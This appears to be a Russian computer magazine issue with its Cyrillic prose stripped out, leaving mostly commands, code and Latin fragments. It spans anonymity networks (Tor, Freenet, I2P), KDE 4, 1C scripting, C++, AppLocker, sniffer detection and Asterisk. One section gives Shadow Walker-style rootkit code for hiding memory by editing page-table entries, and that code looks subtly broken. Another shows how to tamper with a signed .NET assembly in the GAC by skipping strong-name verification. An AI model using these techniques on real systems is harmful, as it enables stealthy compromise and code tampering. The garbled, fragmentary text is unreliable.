apt/sources.list :
deb http://deb.torproject.org/torproject.org karmic main

:
$ gpg --keyserver keys.gnupg.net --recv 886DDD89
$ gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -

apt- :
$ sudo apt-get update
$ sudo apt-get install tor tor-geoipdb privoxy

Privoxy
:
forward-socks4a / 127.0.0.1:9050 .

,
Tor
. https://
check.torproject.org Tor. .
Tor
Privoxy (localhost:8118)
SOCKS- Tor (localhost:9050) . ,
wget, lynx, apt ,
Tor, ~/.bashrc :
export http_proxy=http://127.0.0.1:8118/
export HTTP_PROXY=$http_proxy

SOCKS SSH Tor,


socat:
$ sudo apt-get install socat

SSH (~/.ssh/config)
:
Host *
ProxyCommand socat STDIO SOCKS4A:127.0.0.1:%h:%p,socksport=9050

Privoxy:
$ sudo /etc/init.d/privoxy start

Torbutton Firefox.
https://addons.mozilla.org/firefox/2275/
apt:
$ sudo apt-get install torbutton-extension


Tor
, ,
-
.
Torchat (https://code.google.com/p/torchat/), Tor,
.

Onion Routing (
Mix network)

Mixminion
(http://mixminion.net).
,
,

, ,
.
mixminion
email-
, .
,

.
:

28 ,
, .



Freenet (http://freenetproject.org)
(Ian Clarke), 1999
A Distributed, Decentralised
Information Storage and Retrieval System

,
.
Freenet
, ,

.
Tor, Freenet
,
.
Freenet
,
,
. , , , .
,
.
: , Freenet,

- .
Freenet
,
- ( SHA-1)

INFO

info

I2P

Freenet,
,
. , ,
,

.
. ( Freenet
), ,
, ,
.
,
.
, ,
.

,
, .
, ( ).
Freenet .
,
:
* Frost ,
,
Freenet, .
* jSite
, , Freenet-.
* Thaw .
* freemulet , .
* Freemail .

, -
Freenet

.
Freenet- ,
IM-.
Freenet Java,
:
$ sudo apt-get install sun-java6-jre
$ sudo update-java-alternatives -s java-6-sun

:
$ wget http://downloads.freenetproject.org/alpha/installer/new_installer.jar
$ java -jar new_installer.jar

. Freenet ( ,

run.sh) , Web, .
http://127.0.0.1:8888. FProxy, Freenet- Freenet.
Freenet-. Freenet-
http://127.0.0.1:8888/config/.
,
.

Tor
,


13- USENIX , 13
2004 .

BSD.
Vidalia TorK

Tor,
Qt4.
Tor



-.
Tor
( .onion),

, .


Freenet
,
TCP/
IP- . I2P (Invisible
Internet Project/Protocol) ,
,
Freenet .
Freenet, I2P
. Tor,
I2P Freenet. , I2P
TCP/IP ,

DVD
dvd


LiveCD
Incognito.


UNIXOID
ADEPT ADEPTG@GMAIL.COM

I2P
, (
I2P Tor).
I2P , .

( I2P),
-,
- .

(,
),
, ,
IP-,
.
10 .
I2P
,

-. ,
Freenet-. ,
I2P, :
* I2PSnark I2P. .
* I2P-BT BitTorrent
3.4.2 I2P.
* I2PRufus Rufus I2P.


* I2Phex gnutella- Phex


I2P.
* iMule eMule I2P.
* Susimail
I2P.
* Syndie .

, ,
Azureus,
I2P.
Freenet, I2P
Java .

:
$ wget http://mirror.i2p2.de/i2pinstall-0.7.7.exe
$ java -jar ./i2pinstall-0.7.7.exe

, ,
, .

:
$ ./i2prouter start


: http://127.0.0.1:7657/index.jsp.

HTTP-: 127.0.0.1:4444.
I2P .i2p,
orion.i2p, :
search.i2p eepsites.i2p.
,
. , http://orion.i2p/hosts.txt (http://localhost:7657/susidns/subscriptions.jsp).


LiveCD Incognito (www.anonymityanywhere.com/
incognito/) .
,
.
Tor,
Firefox Torbutton.
, SOCKS HTTP-, . :
* Firefox + Tor + Torbutton WWW.
* TrueCrypt
.
* Enigmail Thunderbird-
.

Tor

* FireGPG Firefox, ,
Web.
* GnuPG OpenPGP.
* KeePassX .
* Miminion .

USB . , . MAC-
.


,
. :
* -
* Bruteforce-
*

-
.


,
.
Bruteforce- , . , -
.

Torbutton

/ .

.
.
,
. ,
.
Freenet I2P,
. Tor, ,
(), ,
(
). z


UNIXOID
zobnin@gmail.com

KDE
7 KDE 4
KDE 4 7 ,
KDE (Pillars of KDE), . , KDE 4 ,
.
, 7 KDE 4:
Solid API
.
Phonon API.
Decibel API
.
Akonadi PIM.
Nepomuk .
Plasma .
Oxygen .

SOLID
KDE 4 ,
BSD Windows.


,
.
KDE 4, ,
Solid API.


Solid
,
API
.
Solid HAL ,
,
, HAL, NetworkManager BlueZ.

, Solid,
.
Solid
. KDE 4 .
NetworkManager, KDE
.

,
.

, ,
.

PHONON
aRts KDE 2 API,

,
( Linux,
BSD
).
aRts KDE KDE 3, - ,

, KDE 4
- Phonon.
aRts, Phonon
, ,
,

DECIBEL


(, Skype
, Kopete
),
(,
Phonon,
), Solid
(,
USB- Phonon
Skype ).
Phonon . API , , API
. , Phonon API
C++
( aRts 30):

media = new MediaObject(this);
connect(media, SIGNAL(finished()), SLOT(slotFinished()));
media->setCurrentSource("/home/username/music/filename.ogg");
media->play();

Phonon ,
, ,
Xine GStreamer UNIX-
DirectShow Windows
(
,
).

, , , , .
. KDE 4, ,
,
.
KDE 2002, 7 , IT-. , , .
(Kicker, Kdesktop, aRts) KDE 2 ,
, , . ,
SuperKaramba, , , . ,
, .
, , , . KDE 3 , ,
.
KDE 4 , .
.
KDE 4 ,
GNOME ( 2.30, , , KDE 4.0),
2 ,
.
turbina (v.turbina@gmail.com), , z 2008 .


KDE 4
, , IP- (VoIP),
(IRC, ICQ, Jabber).
Decibel Telepathy API (
freedesktop.org)
Tapioca. ,
.
KDE 4, , ( )
Decibel.
Decibel , ,

, ,
.

AKONADI
KDE 3 ,
,
,
. Kmail, Kontact , ,

, ,
,


, , . KDE
4
,
Akonadi.
, Akonadi PIM (Personal Information Management,
),
- ,
,
,
.
Akonadi , ,
,
, ,

,
, API
, . Akonadi
,

.
, Akonadi
:
, ,

,
.


UNIXOID

KDE 4.4

Desktop File Indexer.


Advanced Settings,
.
Apply Strigi
.
KRunner
.

PLASMA

Akonadi

NEPOMUK
NEPOMUK (Networked Environment for
Personalized, Ontology-based Management of
Unified Knowledge,
) ,
, nepomuk.semanticdesktop.org
KDE .
KDE 4
.


,
Nepomuk
, ,

. ,

,

.
, KDE-
Nepomuk Strigi,
(,
mp3-). ,
, ,
Dolphin ( ,

, ,
). ,
,
,
KRunner (Alt+F2).
Nepomuk
.
, (System Settings),
Advanced, Desktop
Search Enable
Nepomuk Semantic Desktop Enable Strigi

PLASMA
, C++, JavaScript, Ruby Python
Google Gadgets
SuperKaramba
QEdje, Edje E17
Mac OS X
- HTML JavaScript


KDE 1
KDE.
. KDE 2

, :
,
, ,
, ,
. KDE 3 SuperKaramba
KDE, .

,
.

. .

C++.
KDE 4
KDesktop, Kicker SuperKaramba ,
Plasma.
Plasma
, , , , .
, Plasma
KDE 4
API .
, Plasma , .
Plasma

nepomuk

Plasma : Plasma :

,
, , ..,
, , . Plasma
: , , , ,
, (
,
).
, ,
, - , ,
( ),
KDE 4, ,
,
, , , ,
, .
Plasma Kross,
KDE C++, JavaScript, Ruby Python.
, Plasma ,
,
Plasma Google
Mac OS X (, ,

).
Plasma . KDE
4
.
- ,
..
.
,

Plasma
. ,
Plasma-Netbook
. ,
, ,
.
, Google Summer of Code (Alessandro Diaferia)
, Plasma.
Plasma
.
,
, Plasma KDE 4
: activity.

KDE 4 - . , ,
-
, , , ,
, ..
KDE ,
.
, , ,
, ,

.
, ,
.

Zoom Out.

, Add Activity. . Zoom In
, . .

Zoom In Zoom Out ,

. Zoom Out, Configure
Plasma Different activity for
each desktop.

INFO

info

KDE, ,

.
, KDE 4.5
.

Phonon

KDE 4.0 2008-.

Qt 4.4.

OXYGEN
Oxygen KDE 4, , , . : Oxygen
KDE 4,
Qt4-, , Plasma,
, .. Oxygen ()
,
KDE 4.

, KDE 4 ,
. ,
.
,
, KDE 4.8
,
KDE 4.3. z


CODING

antonov.igor.khv@gmail.com,
ALEKSANDR-EHKKERT@RAMBLER.RU
www.vr-online.ru

1:

-
1: .
.
/
. ( 1) .
X- ?


, 1:,
, ,
. , , 1:
: 7.7, 8.x. ,
.
7.7 . ,
. . . ,
,
. .
, ,
.
1: , / ( ). ,
7.7 -
. , .
.
,
,
.
,
, .

Delphi, Visual C++.
. ? ,

.
, DLL . ,
WinAPI-,
99% ,
, .
8 .
, .
,
1: 8
WinAPI-. ,
. ?, .
: . , : FTP, HTTP, XML,
SMTP, POP3 . . ,
?

1:

, .
, ,
. - 1? ,
, 1:,
. .
: ,
..
1: .
,
. ,
1: !

FTP-

SMTP- -?

- .

1:
#, Python, Delphi . . ,
.
, .
, .
1:
. .
-,
.
.
/: ,
.

,
1:, ,
, .

1: .
/
.

,
. var


CODING

(
). .
.
. :
= "Hello, world!";
//
= 0;
//
= (); //

1: . :
//
()

//
(1, 2)

//
(1, 2)
1 + 2;

.
. :
// . while..do
//
// 1 9
//
= 1;
<> 10
();


1:

= +1;
;
// .
//for..to..do
// 1 10
//
= 1 10
();
;
// .
//foreach
//
= (2);
[0] = 1;
[1] = 2;

();
;

>> coding

SMTP-

,
, 1::
//
//"....|.
// "IF..THEN..ELSE"
// .
= 5;
( = 1)
(" ");
( = 2)
(" ");

(" ");
;

1: :). , , .
.
.

FTP-

FTP- . , MS Office,
? ,
(, )? ,
FTP-. WWW, , FTP, POP3, SMTP,
. .
FTP-. , ,
.


CODING

, 1:
.
, IDE,
.
. .
1: FTP
: FTP. .
PROXY-, / . . , . ,
:
FTP- 1:
= "";
= "";
= " ";
= " ";

FTP = FTP(,
, , );
FTP.(
);

(" FTP
| !",
.);
(());
;
;

FTP.(
..,
.1.);

(" !",
.);


http://infostart.ru/public/20144 ICQ-,
. C#
.NET- IcqSharp 0.4.0.0.
1?
!
http://infostart.ru/public/14457
. ,

.
http://infostart.ru/public/20223

1: 8.x. ,
-.
http://infostart.ru/public/16332 ,
. ,
FTP-, , , , .
1: .
?


(());
;

FTP
FTP.
:
FTP- ()
FTP- ()
FTP-

, PROXY- ()
()
, FTP- .
. , ().
().
FTP-. ,
.....
, , .

FTP- 1: ,
. ,
. , ,
1:, ,
. /
. (.
).

1: , , .
, , .
:
, , ..
( , ), .
, .
,
.
. , , ,
.
smtp-
( ).
. / .

.
.
. . , ,
.

RSS- .
.
Google Reader,
.
1:,
.
RSS- XML-. , , XML . ,

>> coding

RSS-
= RSS.selectSingleNode(
"//channel/description").Text;
= RSS.selectNodes("//item");
= 0 .length-1
= .item().childNodes;


= ;
. =
..;
. =
..;
.. =
..;

= ();
2 = 0 .length-1
.
(.item(2).nodeName,
.item(2).text);
;
= ": ";
(.("title"))
= +
.title;
;

= ..();
. =
..;
= ..();
. =
.;
. = ;
(
(..))
..(
..);
;

= " : ";
(.("pubDate"))
= +
RFC822(.pubDate);
;
= " : ";
(.(link))
= + .link;
;

//
= ;
.SMTP =
..;
.SMTP =
..;
.SMTP =
SMTP.;
.SMTP =
..;
= ;

= " : ";
(.("description"))

= +
.description;
;
("--------------------------");
();
();
();
();
("--------------------------");
;

RSS-. Delphi.
XML COM- Microsoft.XMLHTTP.
, 1:
. RSS- .

OUTRO

, ,
, 1:.
, . ,

.();

(" !
: " + (),
.);
;
;
//

.();
(" !",
.);

(" !" +
(),
.);
;
.();

, ,
. ! z


CODING
stannic.man@gmail.com

WINDOWS
-


.
32- 4
. 64- ,
,
.

,

(
). ,
, Windows.
,

.

, ?


, , Windows, . ,
Windows :
1) 4
2)
, , .


?
( ,
4 , 4 ), (
, 1
).
,

.

,

.

,
.

(page frames),

(paging).
. ,

,
, (
)
. , -
,
- .
, ,
( ): ,
.

, ,
,
,
( )
? ! ,
, !

PTE
0xe4321000
CR3

PT

PD
0x321

0x300
0x390

GetPteAddress:
Oxe4321000
=>0xc0390c84

PTE

1100 0000 0011 1001 0000 1100 1000 0100


PTE
-, .

, ,

. (
), ,
.
: (Page Directory, PDE),
(Page Table, PTE)
(Page Frame). ,
,
INTEL ;
www.intel.com
.
PDE
PTE? !

PTE: ((PTE*)(((((ULONG)(VirtualAddress)) >> 12) << 2) + PteBaseAddress)), PteBaseAddress
0xC0000000. ,
PTE: = ( VirtualAddress >> 10)+0xc0000000.
,
PTE :
VirtualAddress = PTE << 10.
, , . ,
32- : 1100000000.0000000101.0000001001.00
b ( ). ,
PTE 1001b 101b.
, , ,

HTTP://WWW
links

-
Windows?
gr8.cih.ms/index.
php?entry=entry008


wasm.ru
Great .


Windows,
, www.informit.
com/articles/article.
aspx?p=167857.

INFO
. Mm*.
WriteProcessMemory
ReadProcessMemory, . ,
MmGetPhysicalAddress
, , .
MmIsAddressValid() - ,
, ..
Page Fault
. ,
FALSE.
MmIsNonPagedSystemAddressValid,
MmIsAddressValid ,
. , /
, ,
. !

,
,
!

info


!

DVD
dvd

,


.
Shadow Walker
.


, () .

#PF Page Fault ,
( )

.

. !

Windows . ?
, (
) , -


CODING
ALEKSANDR-EHKKERT@RAMBLER.RU

#PF #GP
NtQuerySystemInformation
c SystemModuleInformation
\Driver ZwQueryDirectoryObject.

PsLoadedModuleList ( , , ).


PsLoadedModuleList.
Shadow Walker
.

, Shadow Walker
FU. ,
,
.
INT0E
,
,
#PF PageFault.
, ?
(
) , PTE
, Shadow Walker , ,
; , .
,


Shadow Walker PTE



. , ,
:
. Shadow Walker
;
, ,
.


VOID MarkPageNotPresent(
PPTE pPte )
{
__asm
{
mov eax, pPte
and dword ptr [eax], 0xFFFFFFFE
}
}

,



. ? ,
,
,
. Shadow Walker ;

http://
www.ht-group.net/32, .

,
,
. ,
,
KeAttachProcess. , ,
. ,
, ,
, ZwWriteProcessMemory, z
. !
-
,

. ( ,
!),

, ;
PTE
!
,

, !
:

>> coding



.
?
PTE
DWORD ChangePTEOfTarget(DWORD VirtualAddressOfTarget,
DWORD NewVirtualAddress)
{
DWORD vaTargetPTEaddress;
DWORD vaTargetPTE;
DWORD NewVAPTEaddress;
DWORD NewVAPTE;
DWORD source;
source = VirtualAddressOfTarget;
source = source >> 12;
source = source << 2;
vaTargetPTEaddress = 0xC0000000 + source;
vaTargetPTE = *vaTargetPTEaddr;
source = NewVirtualAddress;
source = source >> 12;
source = source << 2;
NewVAPTEaddress = 0xC0000000 + source;
NewVAPTE = *NewVAPTEaddress;

__asm cli
vaTargetPTEaddress = source;
__asm sti
return source; }

. , . ,
( !)

.

, ,
, , Windows ,
. , The matrix has you, Neo!.
Windows ,
.
.
! z


CODING
ALEXEYBBB@GMAIL.COM

-
z
.NET

.NET. , ,
GAC.
,
.

(
)
. ,
,
.

.
.
,
:
signedLib.dll
namespace signedLib
{
public class sLib
{
public static int GetNumber()
{
return 1;
}
}
}


:
changeKey.exe
namespace changeKey
{


class Program
{
static void Main(string[] args)
{
Console.WriteLine(
signedLib.sLib.GetNumber());
Console.ReadLine();
}
}
}

. .NET Reflector [1] Reflexil [2]


IL- (signedLib.dll), GetNumber()
1, 2. 2.
: /
. , ,
, ,
.
,
, GAC
.

GAC

,

.
, ,
.

,
GAC, .
. ,


( .
, :)). , GAC,
.
. GAC , . ,
! ?
:

.
.
, ,
GAC.
sn.exe (, , sn.exe
). ,
signedLib.dll (
). GAC.
gacutil.exe /i D:\projects\changeKey\signedLib\bin\Release\signedLib.dll


C:\WINDOWS\
ASSEMBLY

changeKey.
exe. , , signedLib.dll ( ,
GAC). changeKey.exe 1.

, . ,
GetNumber() 1, 2.
C:\Windows\assembly
Windows . ,
:


GAC ,

.
dll , sn.exe:

info

subst b: C:\Windows\assembly
sn -Vr C:\Users\Alex\Desktop\signedLib.dll

B.
.Net- GAC_MSIL;
( .dll ).
, , , signedLib.
dll. signedLib.dll .
.NET Reflector
Reflexil (
) .
(
). ,
, .
IL-
, .
Remove Strong Name . (
Register it for verification skipping,
; ,
).
:
, dll;
.
GAC.
.
,
,
( -
).
.NET Reflector ,
( ).
HasPublicKey (

sn.exe ).
, , ,
,
. , GAC,
, ( ). ,

INFO

GAC:
gacutil /u signedLib,Version=1.0.0.0,Culture=neutral,PublicKeyToken=2b1b71846e76146e

:
gacutil /i C:\Users\Alex\Desktop\signedLib.dll

, gacutil.exe :
Assembly successfully added to the cache

,
GAC. ( ), changeKey.
exe, 1. ,
2!

DVD
dvd


. :
(, );
.
CAG, :
1. dll- C:\Windows\assembly
( subst).
2. .
3. IL- .
4. , 2 ( ).
5. .
6. GAC.
7. .
5-7
. !

. z


CODING
deeonis deeonis@gmail.com

C++

++.

, , ,
CPP- .
,
,
INLINE-
.
1

, ,

(backround).
.



changeBackround:
PrettyMenu
class PrettyMenu {
public:

void changeBackround(
std::istream& imgSrc);

private:
Mutex mutex;
Image *bgImage;
int imageChanges;
};
void PrettyMenu::changeBackround(std::istream& imgSrc)
{
    lock(&mutex);
    delete bgImage;
    ++imageChanges;
    bgImage = new Image(imgSrc);
    unlock(&mutex);
}

, - , ,
, . , ,
, ,
, . ,
. C++
, ,
, bad_alloc.
changeBackround
. -, bgImage ( ). , ,
. -,
changeBackround,
, .
:

, . ,
: .
changeBackround,
new Image(imgSrc), ,
unlok.
,
. .
changeBachround
:
Lock
void PrettyMenu::changeBackround(std::istream& imgSrc)
{
    Lock ml(mutex);
    delete bgImage;
    ++imageChanges;
    bgImage = new Image(imgSrc);
}


class PrettyMenu {
public:

std::tr1::shared_ptr<Image> bgImage;

};
void PrettyMenu::changeBackround(std::istream& imgSrc)
{
Lock ml(mutex);
bgImage.reset(new Image(imgSrc));
++imageChanges;
}

; . ,
. ,
, .
, someFunc, f1 f2:

, ,
(
), .
.
new Image(imgSrc) , bgImage
. , imageChanges ,
, . ,
.
:
;
;
.
,
. ,
imgSrc bgImage
. .
, . .
,
.
:
. ,

void someFunc()
void someFunc()
{

f1();
f2();

, f1 f2 ,
someFunc. ,
, .
, f1 , f2 .
someFunc
, f1 , , -
(,
f1 ).

. .
,
.


CODING

, .
, , ,
,
.

.
C++. inline , , .
, , ,
, .
, . ,
,
. , ,
, ,
, .
; , , ,
.
inline , ,
, . -
,
:
inline-
class Person {
public:

//
int age() const { return theAge;}

private:
int theAge;
};


class Base {
public:

private:
std::string bm1, bm2;
};
class Derived: public Base {
public:
Derived(){}

private:
std::string dm1, dm2, dm3;
};


, .
. C++ . ,
, ,
. . .
;
.
. , Derived
:
,
Derived::Derived()
{
Base::Base();
try {dm1.std::string::string();}
catch(...) {
Base::~Base();
throw;
}

,
,
. virtual , , inline . ,
, .

.
, , ,
. ,
- :

try {dm2.std::string::string();}
catch(...) {
dm1.std::string::~string();
Base::~Base();
throw;
}
try {dm3.std::string::string();}
catch(...) {
dm2.std::string::~string();
dm1.std::string::~string();
Base::~Base();
throw;
}

inline-
inline void f() {}
void (*pf)() = f;

//
f();
// , ,
pf();


. :


, ,
,
, . .

inline-. ,
,

. ,
, ,
.
inline,
. ,
,
,
inline.
, ,
, .
, .

: C++, - . ,
, . ,
(,
private), , .
, , .
, C++ - :

#include <string>
#include "date.h"
#include "address.h"
class Person {
public:
Person ( const std::string& name,
const Date& birthday,
const Address& addr);
std::string name() const;
std::string birthDate() const;
std::string address() const;

private:
//
std::string theName;
Date theBirthDate;
Address theAddress;
};

, C++

.
,
C++. :
- . , :
, . ,
, PersonImpl, Person :
-
#include <string>
#include <memory>

//
class PersonImpl;
class Date;
class Address;
class Person {
public:
Person ( const std::string& name,
const Date& birthday,
const Address& addr);
std::string name() const;
std::string birthDate() const;
std::string address() const;

private:
std::tr1::shared_ptr<PersonImpl> pImpl;
};

Person ,
.
Person , .
, , Person, .
- Person
.
, ( ), -.
( ),
:

class Person {
public:
    virtual ~Person();
    virtual std::string name() const = 0;
    virtual std::string birthDate() const = 0;
    virtual std::string address() const = 0;
};

Person,
, .
, -,
,
.
-.
, (, ) .
.
,
, .

. C++ . .
, C++ ,
. z


SYN/ACK
urban.prankster martin@synack.ru

,

,
. ,
, , , ,
Windows.
(, , ),
. , .
(GPO) , Windows.
. ,
,
,
. , ,
( -) GPO
.
,
Microsoft c Group Policy
Settings Reference .
Win2k8 GPO Group Policy
Management Console (GPMC.msc) 2.0.
Windows
(Computer Configuration Windows Settings
Security Settings).
, ,
, ,
, , , NAP, IP-
.
.


.

.
,
,
, ,
.

(Load and Unload Device)
; ,

. ,


, , .
, , , ,
. ,
.

,
. , :

,
(

). ,
,

, ,
.

Vista Win2k8.

DeviceLock.


.


GPO

(Software Restriction Policies, SRP).

,
WinXP .
: ,
, . : ,
, .
, .
GPO SRP,


.
SRP . ,
( )
(New Software
Restriction Policies).
(Unrestricted),
NTFS .
, . , ,

(Disallowed), , . (Basic User), GPO, Vista,
,
, , .
,

(Set as Default). ,
,
. .
. SRP , %SystemRoot% %ProgramFilesDir%.
.
.
4 .
: ( , ),
(, ), ( , , , )
(, Microsoft, Adobe ..). ,
, .

. , ,
( ) ,
.

, .
(Enforcement) ,
, SRP DLL
( ). DLL' ,
, ,
. ,
.
.
.

, .
, - ,
/ . , ,
, ( / ) ,
.
.

APPLOCKER SRP
, ,
,
. , ,
. Win7/Win2k8R2
SRP AppLocker. , SRP
, . SRP, Applocker
, : .
AppLocker Security Settings (secpol.
msc) Application ontrol Policies. ,
,
:
Executable Rules exe, com src;
Windows Installer Rules msi msp ;


SYN/ACK

INFO

info

,
IM, Skype, P2P

, z 2009
.

Script Rules bat, cmd, js, ps1 vbs .


Default,
GPO.
:
Enforced , ,
, ;
Audit Only ; ,
, .
AppLocker.

Enforcement AppLocker.
Advanced Enable DLL rule
collection, DLL.
SRP,
. ,
( NTFS, ), SRP,
. AppLocker
.
:
Create New Rule (Publisher), (Path, )
(File Hash);
Automatically generate Rules
, ,
(Path/Hash)
;
Create Default Rules .


Windows (%WINDIR%) Program Files
(%PROGRAMFILES%); ,
(BUILTIN\Administrator),
.

Enforced,
, .
.
,
: ,
, , (Action)
.
AppLocker
, ,
,
, .
Exceptions
. Add,
, ,
.
.
, , , ,
AppLocker .
Default Rules
. Create New
Rule
. ,
Allow/Deny
, .
Publisher/Path/File Hash
, ,

PROMISCAN



, SRP

. AppLocker
. , C:\
soft, %OSDrive%\soft\*.
, : %WINDIR%,
%SYSTEM32%, %PROGRAMFILES%, %REMOVABLE% (CD/
DVD) %HOT% (USB-). , AppLocker,
, .
, ,
Application Identity (AppIDSvc).
Services (services.msc)
(Security Settings System Services).
:
> gpupdate /force


(, SCCM,
,
z 2009 ).

(AppMgmt), , .

NAT'

. , ,
, ( ),
,
.
, -
WiFi . , ,
. , ,

, (+ ).
- NAT
TTL,
IP- TCP/UDP ( NAT

TTL WIRESHARK

z #111).
.
Wireshark (wireshark.org) (Windows, Linux, xBSD, Solaris, Mac OS X ..)
. :
(, ,
),
.
- NAT
TTL ( ) IP-.
,
TTL, , Windows 128,
Linux 64 ( 255),
. ,
TTL 63 127 ( ),
NAT (
- NAT).
IP only ip.ttl
, TTL 64 128.
,
,
, ,
.
,
Wireshark .
tshark -D,
TTL .

HTTP://WWW
links
TechNet,

technet.microsoft.com/en-us/windowsserver/grouppolicy.
Wireshark
wireshark.org.
BWMeter
desksoft.com/BWMeter.htm.
proDETECT
sf.net/projects/prodetect.
PromiScan
securityfriday.com/products/promiscan.html.

> tshark -i 1 -e ip.ttl -Tfields

tcpdump- ,
IP (ip[8] <
64, TTL 8- IP-).
Wireshark BWMeter
(desksoft.com/BWMeter.htm),
,
.

, .
, : Kerio WinRoute
( -
, z 2007
), UserGate Proxy & Firewall ( -


SYN/ACK

PROMQRY MICROSOFT
, z 2009 ), ISA
Server/Forefront TMG (
, z 2009 ) ,
.
,
Nmap (nmap.org)
.

.
, , -,
.

LAN
,
, .

, ,
, ,
.

(promiscuous mode),
, .

,
:

NIC promiscuous mode , ,


;

;
,
, ARP- IP
, -.

.
ARP-
:
> arp -s hackerhost 00:11:22:33:44:55
> ping hackerhost

, ,
,
.
:
> arp -d hackerhost

. ,
proDETECT (sf.net/projects/prodetect), , , , .

. e-mail.

PromiScan (securityfriday.com/products/promiscan.html)
IP
. , ,
. .
, Microsoft

Promqry PromqryUI,
(support.microsoft.com/kb/892853). ,
GUI. : IP-

Start Query.


, ,
.
,
.
,
LAN;

, ,
- IP-,
, URL
. z

Sergey Jaremchuk feat. Andrey Matveev



ASTERISK

-
. IT- : , , , .
, IP-PBX Asterisk
.
,
, . IP-PBX Asterisk,
?
:
,
( IPsec-
),
- .
, VoIP:
, IVR ( ,

call-), GSM- ..

,
IT- (
)
.
, Asterisk.
,
.
Asterisk'a SIP (Session
Initiation Protocol, RFC 3263), IAX2
(Inter-Asterisk eXchange protocol,
VoIP- IP-PBX Asterisk,
RFC 5456). ,
IAX2
- NAT.
(4569/UDP)

(..

, ) .

.
,

. ,
SIP, IAX2
, ,
.

iax.conf.

.
$ sudo nano /etc/asterisk/iax.conf
; Asterisk
[general]
;register => <username>:<password>@< IP >
register => userB:password@synack.ru
;
[synack]
type=friend
user=username
secret=password
host=synack.ru
context=synack


:
$ sudo nano /etc/asterisk/extensions.conf
[synack]
exten => _5XXX,1,NoOp()
exten => _5XXX,n,Dial(IAX2/synack/${EXTEN})
exten => _5XXX,n,Hangup()

, ,
.
iax.conf . ,
,
register.
$ sudo nano /etc/asterisk/iax.conf
[office]
type=friend
user=user
secret=password
host=dynamic
; IP-
deny=0.0.0.0/0
permit=11.22.33.44
context=office

extensions.conf
:
exten => _8XXX,1,Dial(IAX2/office/${EXTEN})


SYN/ACK

IP-PBX Asterisk, ,
.
. ,
. , Asterisk
.
, :
exten => 3000,1,GotoIfTime(9:00-18:00|mon-fri|*|*?OUT,s,1)

, !

SIP-
SIP-, , .
,
. Asterisk ,
SIP- ,
,

-.
,
. ,
SIP'
sipnet.ru.

IAX2. SIP
sip.conf.
$ sudo nano /etc/asterisk/sip.conf
[general]
...
useragent=SipPhone
register=myusername:mypassword@sipnet.ru/2223322
;
disallow=all
allow=ulaw
allow=alaw


allow=gsm
[sipnet]
type=friend
username=myusername
secret=mypassword
callerid=sipnet
host=sipnet.ru
nat=yes
fromuser=sipnet
fromdomain=sipnet.ru
dtmfmode=rfc2833
insecure=invite
context=sipnet

SIP. , , FAQ
,
.
:
$ sudo nano /etc/asterisk/extensions.conf
[sipnet-in]
exten => 101,1,Set(CALLERID(name)="Sipnet call")
exten => 101,n,Dial(SIP/101,20)
exten => 101,n,Playback(vm-nobodyavail)
exten => 101,n,Voicemail(101)
exten => 101,n,Hangup()
[sipnet-out-moscow]
exten => _749[59]ZXXXXXX,1,Set(CALLERID(all)="SipPhone" <2223322>)
exten => _749[59]ZXXXXXX,n,Dial(SIP/sipnet/${EXTEN},20)
exten => _749[59]ZXXXXXX,n,Hangup()

CALLBACK ,
, . ,

A2BILLING

.
?
. :
, ,
- ,
, , ,
..
Asterisk
, . /
var/lib/asterisk/outgoing .call-,
Asterisk
. extensions.conf
:
$ sudo nano /etc/asterisk/extensions.conf
[IncomingCall]
; , ,

exten => s,1,GotoIf($["${CALLERID(num)}" = "9151234567"]?callback)
; ,

exten => s,n,Goto(normal) ;
,
exten => s,n(callback),System(/etc/asterisk/scripts/callback 8${CALLERID(num)} &)
exten => s,n,Hangup()
exten => s,n(normal)
; ,

[InternalCall]
exten => 123,1,Dial(SIP/123)
exten => 123,n,Hangup()
exten => _89X.,1,Dial(SIP/${EXTEN}@GW_IP)
exten => _89X.,n,Hangup()

, call. , , System,
:
exten => h,6,System(echo Channel: SIP/${CALLERID(num)} > /tmp/${CALLERID(num)}.call)

:
$ sudo nano /etc/asterisk/scripts/callback
#!/bin/sh
sleep 5
# Number to call back, passed in by the dialplan
NUMBER=$1
# Build the call file in /tmp first, then move it into the spool directory
cat << EOF > "/tmp/$NUMBER.call"
Channel: SIP/$NUMBER@InternalCall
MaxRetries: 1
RetryTime: 30
WaitTime: 30
Context: InternalCall
Extension: 777
Priority: 1
AlwaysDelete: Yes
EOF
# The call file must belong to the asterisk user before it is queued
chown asterisk:asterisk "/tmp/$NUMBER.call"
mv "/tmp/$NUMBER.call" /var/spool/asterisk/outgoing/

CALLBACK ELASTIX

: , Asterisk
call-,
.
outgoing ;
Asterisk , , .
outgoing .
, .
, Callback web,
, call-
CGI-. .

, Callback
.
(,
), Asterisk . InternalCall
.
,
PIN

INFO

info

call-
AMI (Asterisk
Manager Interface)
Asterisk.

5038 .

AstBill
,


z 2008 .


SYN/ACK

FREEPBX
ASTERISK

HTTP://WWW
links
Asterisk
A2billing (www.asterisk2billing.org),
Asterisell (asterisell.profitoss.com).


CDR
Asterisk Queue/CDR Log Analyzer (www.micpc.com/qloganalyzer),
Asterisk-Stat (www.areski.net/asterisk-stat-v2).
Asterisk
asteriskpbx.ru/browser/astpbx/etc/asterisk.


CDR- ASTERISK QUEUE/CDR LOG ANALYZER

.
Asterisk PIN-,
( ).
, .
, () allback SMS-, e-mail,
( ,
z 2009 ), (,
) . ,
.call-,

.


Asterisk, .
A2billing (www.asterisk2billing.org), Asterisell (asterisell.profitoss.com), astCDRview
(astcdrview.berlios.de), AstBill (astbill.com), 9
10 . ,


, , Asterisk
.
Asterisk CDR-
(Call Detail Record). CallerID, , , ,
, ,
. Asterisk
CSV-, CDR MySQL, PostgreSQL, unixODBC,
RADIUS. , CSV- MySQL ,
(
www.voip-info.org/wiki/view/Asterisk+CDR+csv+mysql+import).
MySQL Asterisk . AddOns.
Asterisk
. Debian/Ubuntu :
$ sudo apt-get install asterisk-mysql

, ,

:
. ,
(),
, .
, ,
.

. Asterisk VoIP- .
, , .

$ mysql -uroot -p
mysql> CREATE DATABASE asterisk;
mysql> GRANT ALL PRIVILEGES ON asterisk.* TO asteriskuser@localhost IDENTIFIED BY 'astpassw';

Asterisk cdr_mysql.txt ( Ubuntu


/usr/share/doc/asterisk-mysql).
CDR MySQL,
asterisk:
$ sudo nano /etc/asterisk/cdr_mysql.conf
[global]
hostname=localhost
dbname=asterisk
table=cdr
password=astpassw
; must be the account created by the GRANT statement
user=asteriskuser
port=3306
sock=/tmp/mysql.sock

ASTERISK


Asterisk:
$ asterisk -r
